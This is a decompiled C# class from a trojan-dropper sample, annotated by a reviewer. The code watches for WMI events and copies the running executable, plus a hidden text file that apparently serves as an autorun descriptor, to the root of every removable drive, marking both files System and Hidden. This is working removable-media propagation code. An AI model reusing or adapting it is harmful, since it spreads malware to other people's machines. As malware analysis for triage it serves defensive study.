// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
//
// Analyst notes (added during review):
//  - All type, member and namespace names are obfuscated to control characters and
//    printed by the decompiler as \uXXXX escapes. Several distinct members end up
//    with the same printed name, so this listing is for reading only and is not
//    expected to compile as shown.
//  - Every string the class uses is fetched at run time through a call of the form
//    \u0005.\u0001(<int>); none of the literals are visible here. Anything said below
//    about what a string contains is an assumption to confirm by decoding it.
using \u0001;
using \u000F;
using System;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Runtime.InteropServices;
using System.Threading;

namespace \u000F
{
  /// <summary>
  /// Registers a WMI event watcher and, each time the watched event arrives, writes
  /// two files to the root of every removable drive: a six-line text file and a copy
  /// of the running executable, both flagged System, Hidden, NotContentIndexed and ReadOnly.
  /// </summary>
  /// <remarks>
  /// NOTE(review): a hidden text file plus a hidden copy of the executable at the drive
  /// root resembles autorun-style removable-media propagation. The file names and the
  /// text written are encoded, so confirm against the decoded strings. For triage, the
  /// observable artefacts are a WMI event subscription created by this process and
  /// System+Hidden files appearing at the root of removable volumes.
  /// </remarks>
  internal sealed class \u0005
  {
    // Invoked throughout the class as \u0005.\u0001(int) and used wherever a string is
    // required; presumably a delegate that decodes an embedded string by numeric id.
    // Its type \u0002 is declared outside this listing (TODO confirm).
    [NonSerialized]
    internal static \u0002 \u0001;
    // The single WMI watcher instance. It prints with the same name as the field above
    // only because of the obfuscation; the two are told apart by how they are used.
    private static ManagementEventWatcher \u0001;

    /// <summary>
    /// Builds the WMI scope and event query, attaches the event handler below and starts
    /// the watcher. Any exception is swallowed; if a watcher object was already created
    /// when the exception occurred, it is stopped.
    /// </summary>
    public static void \u000F()
    {
      // Scope path is encoded (id 8131); presumably a WMI namespace (verify).
      ManagementScope scope = new ManagementScope(\u0005.\u0001(8131));
      // Ask the WMI connection to enable the caller's privileges for the operation.
      scope.Options.EnablePrivileges = true;
      try
      {
        Thread.Sleep(50);
        // Event class (id 8148) and WHERE condition (id 8181) are encoded. The query
        // uses a 3-second WITHIN interval.
        // NOTE(review): given that the handler only acts on removable drives, this is
        // presumably a volume or device arrival event; confirm from the decoded strings.
        \u0005.\u0001 = new ManagementEventWatcher(scope, (EventQuery) new WqlEventQuery()
        {
          EventClassName = \u0005.\u0001(8148),
          WithinInterval = new TimeSpan(0, 0, 3),
          Condition = \u0005.\u0001(8181)
        });
        // The two-argument \u000F overload below is the callback for each event.
        \u0005.\u0001.EventArrived += new EventArrivedEventHandler(\u0005.\u000F);
        \u0005.\u0001.Start();
      }
      catch
      {
        // Failure is silent: nothing is logged or rethrown.
        if (\u0005.\u0001 == null)
          return;
        \u0005.\u0001.Stop();
      }
    }

    /// <summary>
    /// WMI event callback. For every drive reported as <c>DriveType.Removable</c> it
    /// replaces two files at the drive root (ids 8246 and 8263), then stops and
    /// restarts the watcher.
    /// </summary>
    /// <param name="obj0">Event sender; not used in the body.</param>
    /// <param name="obj1">Event arguments; not used in the body.</param>
    public static void \u000F([In] object obj0, [In] EventArgs obj1)
    {
      foreach (DriveInfo drive in DriveInfo.GetDrives())
      {
        if (drive.DriveType == DriveType.Removable)
        {
          try
          {
            Thread.Sleep(50);
            // Remove any earlier copies of the two files so they can be written again.
            if (File.Exists(drive.Name + \u0005.\u0001(8246)))
              File.Delete(drive.Name + \u0005.\u0001(8246));
            if (File.Exists(drive.Name + \u0005.\u0001(8263)))
              File.Delete(drive.Name + \u0005.\u0001(8263));
          }
          catch
          {
            // Delete failures are ignored.
          }
          // First file (id 8246): six encoded text lines are written to it.
          // NOTE(review): presumably an autorun-style descriptor that refers to the
          // second file; confirm from the decoded strings.
          StreamWriter streamWriter = new StreamWriter(drive.Name + \u0005.\u0001(8246));
          streamWriter.WriteLine(\u0005.\u0001(8280));
          streamWriter.WriteLine(\u0005.\u0001(8293));
          streamWriter.WriteLine(\u0005.\u0001(8314));
          streamWriter.WriteLine(\u0005.\u0001(8371));
          streamWriter.WriteLine(\u0005.\u0001(8396));
          streamWriter.WriteLine(\u0005.\u0001(8429));
          streamWriter.Close();
          Thread.Sleep(50);
          // Flag the text file System | Hidden | NotContentIndexed | ReadOnly, keeping
          // whatever attributes it already had.
          File.SetAttributes(drive.Name + \u0005.\u0001(8246), File.GetAttributes(drive.Name + \u0005.\u0001(8246)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly);
          try
          {
            // Second file (id 8263): a copy of the currently running executable,
            // given the same four attributes.
            File.Copy(Process.GetCurrentProcess().MainModule.FileName, drive.Name + \u0005.\u0001(8263));
            File.SetAttributes(drive.Name + \u0005.\u0001(8263), File.GetAttributes(drive.Name + \u0005.\u0001(8263)) | FileAttributes.System | FileAttributes.Hidden | FileAttributes.NotContentIndexed | FileAttributes.ReadOnly);
          }
          finally
          {
            // No catch clause here: the 2-second pause runs whether or not the copy
            // succeeded, and an exception from the copy still leaves the handler.
            Thread.Sleep(2000);
          }
        }
        // Executed once per enumerated drive of any type, because it sits inside the
        // foreach but outside the removable-drive check. Stop() is guarded by the null
        // test; Start() is not.
        if (\u0005.\u0001 != null)
          \u0005.\u0001.Stop();
        \u0005.\u0001.Start();
      }
    }

    // Type initializer: calls a static method on another obfuscated type (\u0003)
    // before first use of this class. Presumably this sets up the string-decoding
    // delegate field; \u0003 is not part of this listing (TODO confirm).
    static \u0005() => \u0003.\u000F();
  }
}